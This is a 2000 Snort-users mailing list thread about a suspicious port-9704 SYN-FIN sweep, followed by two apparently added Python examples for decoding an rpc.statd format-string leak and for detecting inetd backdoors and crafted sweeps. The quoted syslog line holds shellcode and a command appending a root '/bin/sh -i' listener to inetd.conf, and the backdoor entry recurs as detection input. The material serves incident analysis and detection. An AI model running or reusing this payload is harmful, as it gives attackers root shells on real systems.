[Snort-users] Odd packets... maybe a new Trojan?

Frank Reid fcreid at ...691...
Wed Oct 25 21:22:50 EDT 2000


Copied from another source:

Yup. 9704 is the port added to inetd by a pretty well-known overflow for 
rpc.statd: 


Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname 
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 
696e6961 2720676e 203a272f 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00bffff7 
0400000000000000000000000000000000000000000000000bffff7050000bffff706000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90 
><90><90 
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 
><90><90 
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> 
<8D>^( 
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 
1<83> 
<88>F'<88>F*<83> <88>F<89>F+, 
<89><8D>N<8D>V<80>1<89>@<80>/bin 
/sh -c echo 9704 stream tcp 
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd 


...and BONK! they have a rootshell running on 9704. 


See http://www.securityfocus.com/bid/1480 


I'd let the owners know, pronto. Alternatively if you have any control 
over them, get them unplugged. 



-----Original Message-----
From: snort-users-admin at lists.sourceforge.net
[mailto:snort-users-admin at lists.sourceforge.net]On Behalf Of Tom Whipp
Sent: Wednesday, October 25, 2000 05:07
To: snort-users at lists.sourceforge.net
Subject: [Snort-users] Odd packets... maybe a new Trojan?
Importance: High


Hi all,

	I got scanned last night, but I haven't the faintest idea what this
signature represents... about half the hosts in my subnet got the following
packets allegedly from an Iranian university network.

Source/Dest port	9704
ID			39426
Ack			0x7A019CB1

Given that the ID and ack are identical in all packets it doesn't look like
a vanilla port scan, so my guess is that this represents the initial stage
of a Trojan client/server connection... but of course that's complete
conjecture.

I've tried to check whitehats but can't get in, I've done some general web
searches but can't find anything and I've taken a look in the 10102k.rules
file but it doesn't seem to have any equivalent rule.

any thoughts?

	Tom

PS:

Here is an extract from my logs... not sure if it will tell you anything
more than above but it seems worth a shot.

[**] SCAN-SYN FIN [**]
10/24-18:40:33.351849 213.29.27.30:9704 -> xxx.xxx.xxx.1:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SCAN-SYN FIN [**]
10/24-18:40:33.451830 213.29.27.30:9704 -> xxx.xxx.xxx.2:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SCAN-SYN FIN [**]
10/24-18:40:33.454766 213.29.27.30:9704 -> xxx.xxx.xxx.3:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SCAN-SYN FIN [**]
10/24-18:40:33.462549 213.29.27.30:9704 -> xxx.xxx.xxx.5:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


_______________________________________________
Snort-users mailing list
Snort-users at lists.sourceforge.net
http://lists.sourceforge.net/mailman/listinfo/snort-users
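Added example, not part of either message in this thread: the quoted rpc.statd syslog line carries a run of 8-digit hex words, which is what a %x-style format string expansion writes when the hostname argument reaches syslog() as the format (BID 1480 is a format string bug in statd). Decoding those words as little-endian x86 stack contents brings the log prefix itself back out, which is the tell for this class of bug. The second half looks for the inetd.conf entry the payload appends (9704 stream tcp nowait root /bin/sh sh -i). The syslog line is copied from Frank's quote; the inetd.conf excerpt and the SHELLS list are constructed assumptions.

```python
"""Added example, not from the thread: decode the rpc.statd stack leak that
Frank's quoted syslog line shows, and look for the inetd entry the payload
installs (9704 stream tcp nowait root /bin/sh sh -i)."""
import re
import struct

# First line of the syslog extract quoted in Frank's reply, used here as
# sample input.
STATD_LOG = (
    "Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname "
    "containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 "
    "72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 "
    "696e6961 2720676e 203a272f"
)

# Eight hex digits that are not part of a longer hex run: the words a %x-style
# format string expansion wrote into the log.
HEXWORD = re.compile(r"(?<![0-9a-fA-F])[0-9a-f]{8}(?![0-9a-fA-F])")


def stack_words(line):
    """Leaked 32-bit words, in the order syslog printed them."""
    return [int(w, 16) for w in HEXWORD.findall(line)]


def leaked_bytes(words):
    """Lay the words back out as the little-endian x86 stack they were read from."""
    return b"".join(struct.pack("<I", w) for w in words)


def printable_runs(data, min_len=8):
    """Printable ASCII runs of at least min_len bytes inside leaked stack data.

    The format string itself lives on the stack, so its text comes back out
    of a %x dump; seeing the log prefix here is the signature of a format
    string bug rather than a plain overflow.
    """
    runs, cur = [], bytearray()
    for b in data + b"\x00":          # sentinel flushes the final run
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs


# Constructed /etc/inetd.conf excerpt; the last entry is what the quoted
# payload appends with "echo ... >> /etc/inetd.conf".
INETD_SAMPLE = """\
# /etc/inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
9704 stream tcp nowait root /bin/sh sh -i
"""

# Assumed list of shell binaries to treat as suspicious server programs.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh", "/bin/tcsh", "/bin/zsh"}


def inetd_backdoors(conf_text):
    """Flag inetd.conf entries that hand the accepted socket straight to a shell.

    Field order: service socket_type proto wait/nowait user[.group] server args.
    A shell as the server program is the tell; a numeric service name such as
    9704 is only a supporting hint, since legitimate entries may use ports too.
    """
    hits = []
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue
        service, _sock, _proto, _wait, user, server = fields[:6]
        if server not in SHELLS:
            continue
        reasons = ["server program is a shell"]
        if "-i" in fields[6:]:
            reasons.append("interactive shell (-i)")
        if service.isdigit():
            reasons.append("numeric service name")
        hits.append({"line": lineno, "service": service,
                     "user": user.split(".")[0].split(":")[0],
                     "server": server, "reasons": reasons})
    return hits


if __name__ == "__main__":
    words = stack_words(STATD_LOG)
    print("leaked words:", ["%08x" % w for w in words[:3]], "...")
    print("text recovered from the stack:", printable_runs(leaked_bytes(words)))
    for h in inetd_backdoors(INETD_SAMPLE):
        print("inetd.conf line %d: %s -> %s as %s (%s)"
              % (h["line"], h["service"], h["server"], h["user"],
                 ", ".join(h["reasons"])))
```

The first three words (08049f10, bffff754, 000028f8) are a text address, a stack address and a small integer; everything after them spells out "SM_MON request for hostname containing '/': ", i.e. the format string being read back off the stack. On a suspect box, run inetd_backdoors() over the real /etc/inetd.conf and also check that inetd is not still holding the appended entry in memory after the file is cleaned, since the payload HUPs inetd to load it.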
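Added example, not part of either message in this thread: Tom's point that the IP ID and ACK are identical across every host is worth turning into a check, because a real TCP stack or a scanner that lets the kernel build packets picks fresh values per packet, whereas a hand-crafted sweep tends to reuse one header template. The code below parses alert records in the Snort 1.6 format Tom pasted and reports, per source, how many hosts were touched and which header fields never varied. The four 213.29.27.30 records are copied from his log; the 198.51.100.7 records are constructed as a contrast and are not from the thread.

```python
"""Added example, not from the thread: parse the Snort 1.6-style alerts Tom
posted and check whether a source swept hosts with fixed header fields."""
import re
from collections import defaultdict

# Constructed sample. The 213.29.27.30 records are the four from Tom's log
# (masked destinations kept); the 198.51.100.7 records are made up as a
# contrast: same rule firing, but ID, seq and source port change per packet.
SAMPLE_ALERTS = """\
[**] SCAN-SYN FIN [**]
10/24-18:40:33.351849 213.29.27.30:9704 -> xxx.xxx.xxx.1:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404
[**] SCAN-SYN FIN [**]
10/24-18:40:33.451830 213.29.27.30:9704 -> xxx.xxx.xxx.2:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404
[**] SCAN-SYN FIN [**]
10/24-18:40:33.454766 213.29.27.30:9704 -> xxx.xxx.xxx.3:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404
[**] SCAN-SYN FIN [**]
10/24-18:40:33.462549 213.29.27.30:9704 -> xxx.xxx.xxx.5:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404
[**] SCAN-SYN FIN [**]
10/24-19:02:10.100000 198.51.100.7:40001 -> xxx.xxx.xxx.1:22
TCP TTL:48 TOS:0x0 ID:10234
**SF**** Seq: 0x11A2B3C4   Ack: 0x0   Win: 0x800
[**] SCAN-SYN FIN [**]
10/24-19:02:10.200000 198.51.100.7:40002 -> xxx.xxx.xxx.2:22
TCP TTL:48 TOS:0x0 ID:10987
**SF**** Seq: 0x5E6F7081   Ack: 0x0   Win: 0x800
[**] SCAN-SYN FIN [**]
10/24-19:02:10.300000 198.51.100.7:40003 -> xxx.xxx.xxx.3:22
TCP TTL:48 TOS:0x0 ID:11502
**SF**** Seq: 0x0C0D0E0F   Ack: 0x0   Win: 0x800
"""

# One alert record: signature line, addresses, IP header, TCP header. The
# flags field is matched as a string so the bit order of the Snort version
# in use does not matter; we only ask which letters are present.
ALERT_RE = re.compile(
    r"\[\*\*\] (?P<sig>.+?) \[\*\*\][^\n]*\n"
    r"(?P<ts>\S+) (?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)[^\n]*\n"
    r"TCP TTL:(?P<ttl>\d+) TOS:0x[0-9A-Fa-f]+ ID:(?P<id>\d+)[^\n]*\n"
    r"(?P<flags>[12UAPRSF*]{8}) Seq: 0x(?P<seq>[0-9A-Fa-f]+)\s+"
    r"Ack: 0x(?P<ack>[0-9A-Fa-f]+)\s+Win: 0x(?P<win>[0-9A-Fa-f]+)"
)


def parse_alerts(text):
    """Turn Snort alert records into dicts with numeric header fields."""
    alerts = []
    for m in ALERT_RE.finditer(text):
        a = m.groupdict()
        for k in ("sport", "dport", "ttl", "id"):
            a[k] = int(a[k])
        for k in ("seq", "ack", "win"):
            a[k] = int(a[k], 16)
        alerts.append(a)
    return alerts


def sweep_summary(alerts, min_hosts=3):
    """Per source: hosts touched, which header fields never varied, and whether
    that looks like a hand-crafted sweep (fixed IP ID, seq and ack across
    several hosts) rather than a stack or scanner picking fresh values."""
    by_src = defaultdict(list)
    for a in alerts:
        by_src[a["src"]].append(a)
    summary = {}
    for src, pk in by_src.items():
        hosts = {p["dst"] for p in pk}
        fixed = {f for f in ("id", "seq", "ack", "sport", "ttl")
                 if len({p[f] for p in pk}) == 1}
        summary[src] = {
            "hosts": len(hosts),
            "fixed_fields": fixed,
            "syn_fin": all("S" in p["flags"] and "F" in p["flags"] for p in pk),
            "sport_equals_dport": all(p["sport"] == p["dport"] for p in pk),
            "crafted_sweep": len(hosts) >= min_hosts and {"id", "seq", "ack"} <= fixed,
        }
    return summary


if __name__ == "__main__":
    for src, s in sweep_summary(parse_alerts(SAMPLE_ALERTS)).items():
        print(src, s)
```

For the thread's source the summary shows four hosts, SYN+FIN on every packet, source port equal to destination port, and ID, seq, ack, sport and TTL all constant, which is what Tom's eye picked up: one raw-socket template fired at consecutive addresses rather than a connection attempt. The constructed contrast source trips the same rule but only keeps ack and TTL fixed, so it is not reported as a crafted sweep.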




